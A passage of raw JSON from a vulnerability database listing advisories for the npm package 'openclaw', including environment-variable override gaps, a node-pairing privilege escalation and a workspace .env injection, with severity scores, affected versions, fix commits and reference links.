h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3
zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-h
d4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-w
mr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-89hr-6x2p-8xjv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1p3b-pfnn-x7ad"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89787?format=json","vulnerability_id":"VCID-1p5p-eth5-3ufu","summary":"OpenClaw: Host exec environment overrides miss proxy, TLS, Docker, and Git TLS controls\n## Summary\nHost exec environment overrides miss proxy, TLS, Docker, and Git TLS controls\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28: host exec env policy still missed 
proxy, TLS, Docker, and Git TLS variables until 4d912e0451 on 2026-03-31; maintainers already accepted it and the fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d912e04519b4bd53b248437c53748cdebce9a41` — 2026-03-31T21:25:36+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41330","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0286","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02913","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02906","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41330"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4d912e04519b4bd53b248437c53748cdebce9a41","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/
VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/"}],"url":"https://github.com/openclaw/openclaw/commit/4d912e04519b4bd53b248437c53748cdebce9a41"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9gp8-hjxr-6f34","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9gp8-hjxr-6f34"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41330","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/A
V:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41330"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-via-host-exec-policy","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-via-host-exec-policy"},{"reference_url":"https://github.com/advisories/GHSA-9gp8-hjxr-6f34","reference_id":"GHSA-9gp8-hjxr-6f34","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9gp8-hjxr-6f34"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vuln
erability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vuln
erability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41330","GHSA-9gp8-hjxr-6f34"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1p5p-eth5-3ufu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90329?format=json","vulnerability_id":"VCID-1pbz-8rnx-dkhe","summary":"OpenClaw: Node Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement\n## Impact\n\nNode Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement.\n\nA previously paired node 
could reconnect with a broader command set, including exec-capable commands, without forcing the operator/admin re-pairing path.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.5`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42432","reference_id":"","reference_type":"","scores":[{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08076","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08073","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.0809","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42432"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5wj5-87vq-39xm","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr
","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:17:47Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5wj5-87vq-39xm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42432","reference_id":"CVE-2026-42432","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42432"},{"reference_url":"https://github.com/advisories/GHSA-5wj5-87vq-39xm","reference_id":"GHSA-5wj5-87vq-39xm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5wj5-87vq-39xm"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-command-escalation-via-node-pairing-reconnect-bypass","reference_id":"openclaw-command-escalation-via-node-pairing-reconnect-bypass","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:17:47Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-command-escalation-via-node-pairing-reconnect-bypass"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},
{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},
{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42432","GHSA-5wj5-87vq-39xm"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1pbz-8rnx-dkhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89803?format=json","vulnerability_id":"VCID-1smq-mbty-jkaj","summary":"OpenClaw has a CWD `.env` environment variable injection which bypasses host-env policy and allows config takeover\n## Summary\n\nOpenClaw loaded the current working directory `.env` before trusted state-dir configuration, allowing untrusted workspace state to inject host environment values.\n\n## Impact\n\nA repository or workspace containing a malicious `.env` file could override runtime configuration and security-sensitive environment settings when OpenClaw started there.\n\n## Affected Component\n\n`src/infra/dotenv.ts, src/cli/dotenv.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `6a79324802` (`Filter untrusted CWD .env entries before OpenClaw 
startup`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41294","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03519","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03533","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.0352","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41294"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/6a793248024dca7685f63bcceb64a0096fd1586d","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/